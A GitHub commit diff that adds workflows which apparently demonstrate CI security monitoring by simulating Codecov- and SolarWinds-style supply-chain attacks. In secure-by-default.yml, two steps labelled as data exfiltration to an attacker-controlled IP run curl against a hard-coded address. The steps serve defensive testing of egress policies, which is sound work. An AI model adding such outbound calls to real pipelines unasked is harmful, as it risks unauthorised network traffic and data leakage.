Skip to content

Commit

Permalink
Add more ARC workflows
Browse files Browse the repository at this point in the history
  • Loading branch information
varunsh-coder committed Sep 10, 2023
1 parent f268f74 commit 00617eb
Show file tree
Hide file tree
Showing 4 changed files with 40 additions and 2 deletions.
2 changes: 1 addition & 1 deletion .github/workflows/arc-codecov-simulation.yml
Original file line number Diff line number Diff line change
@@ -1,4 +1,4 @@
name: ARC Codecov Simulation
name: 3. ARC Codecov Simulation
on:
workflow_dispatch:

Expand Down
2 changes: 1 addition & 1 deletion .github/workflows/arc-solarwinds-simulation.yml
Original file line number Diff line number Diff line change
@@ -1,4 +1,4 @@
name: ARC SolarWinds Simulation
name: 4. ARC SolarWinds Simulation
on:
workflow_dispatch:

Expand Down
16 changes: 16 additions & 0 deletions .github/workflows/arc-zero-effort-observability.yml
Original file line number Diff line number Diff line change
@@ -0,0 +1,16 @@
name: 1. Zero-effort Observability

on:
workflow_dispatch:
push:

jobs:
observability:
runs-on: self-hosted
permissions:
contents: read
steps:
- uses: actions/checkout@v2

- name: Build Docker image
run: docker build .
22 changes: 22 additions & 0 deletions .github/workflows/secure-by-default.yml
Original file line number Diff line number Diff line change
@@ -0,0 +1,22 @@
name: 2. Secure-By-Default ARC Cluster-Level Policy
on:
workflow_dispatch:
push:

jobs:
direct-ip-hosted:
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@v3

# Codecov Scenario: Exfiltrate data to attacker's IP address
- name: Data Exfiltration To Attacker Controlled IP address
run: curl 104.16.209.12 -L
direct-ip-arc:
runs-on: self-hosted
steps:
- uses: actions/checkout@v3

# Codecov Scenario: Exfiltrate data to attacker's IP address
- name: Data Exfiltration To Attacker Controlled IP address
run: curl 104.16.209.12 -L

0 comments on commit 00617eb

Please sign in to comment.